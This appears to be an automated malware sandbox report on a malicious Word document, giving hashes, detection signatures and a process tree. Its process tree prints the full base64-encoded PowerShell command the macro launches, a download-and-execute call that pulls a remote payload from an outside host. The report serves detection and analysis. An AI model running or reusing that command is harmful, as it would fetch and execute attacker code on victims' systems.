Edit tour
Windows
Analysis Report
DUD6CqQ1Uj.doc
Overview
General Information
Sample name: | DUD6CqQ1Uj.docrenamed because original name is a hash value |
Original sample name: | 9ebf60ad31f0eb1fa303e0b00f9cc605c5013ea30771e6b14409cb70af7416cb.doc |
Analysis ID: | 1584650 |
MD5: | 4fd8d5da5cd2109c730052735c9ccbb6 |
SHA1: | 2d175610936cdfc27380c13d89f5883db532d2b2 |
SHA256: | 9ebf60ad31f0eb1fa303e0b00f9cc605c5013ea30771e6b14409cb70af7416cb |
Tags: | docuser-zhuzhu0009 |
Infos: | |
Detection
Score: | 96 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Multi AV Scanner detection for submitted file
Yara detected Powershell download and execute
Document exploit detected (process start blacklist hit)
Encrypted powershell cmdline option found
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Office process queries suspicious COM object (likely to drop second stage)
Sigma detected: PowerShell Base64 Encoded IEX Cmdlet
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Contains long sleeps (>= 3 min)
Detected non-DNS traffic on DNS port
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Execution of Powershell with Base64
Uses code obfuscation techniques (call, push, ret)
Classification
- System is w11x64_office
- WINWORD.EXE (PID: 7328 cmdline:
"C:\Progra m Files\Mi crosoft Of fice\Root\ Office16\W INWORD.EXE " /Automat ion -Embed ding MD5: A9F0EC89897AC6C878D217DFB64CA752) - powershell.exe (PID: 7996 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -e SQBFAFg AIAAoAE4AZ QB3AC0ATwB iAGoAZQBjA HQAIABOAGU AdAAuAFcAZ QBiAEMAbAB pAGUAbgB0A CkALgBEAG8 AdwBuAGwAb wBhAGQAUwB 0AHIAaQBuA GcAKAAnAGg AdAB0AHAAc wA6AC8ALwB lAHQAZQByA G4AYQBsAC4 AbABvAGwAL wBmAGkAbAB lAC8AOABlA DUAMwBhADM AZQAwADIAM wAyADEAOAB hADkAYgAxA GUAZgA5AGI AYQAxAGUAZ gAzAGIANQB hAGYAZAAxA DkAMQBhADk AOQAxADUAN gBiADcANwA 4ADYANAA1A DUAOABkAC8 AOABlAGUAZ gA0AGQAZgA zADgAOABmA DIAMgAxADc AYwBhAGUAY wAzAGQAYwA yADYALgBqA HAAZwAnACk AOwBvAGEAd wBuAGQAdQB hAHcAZABuA G4AaABuADk AMgA4ADMAa AAxADkAMgA xAG4AYQB3A G8AZABhAG4 AZgBpAGEAd wBiAGQAbgB pAHUAZgBiA G4AYQBpAGQ AdwB1AGEAa QBmAHUAYQB iAGkAdQBmA GIAYQBpAHU AZABiAGgAa gBhAHcAZAB iAGEAZgBoA GoA"" MD5: 9D8E30DAF21108092D5980C931876B7E) - conhost.exe (PID: 7976 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 9698384842DA735D80D278A427A229AB)
- cleanup
⊘No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |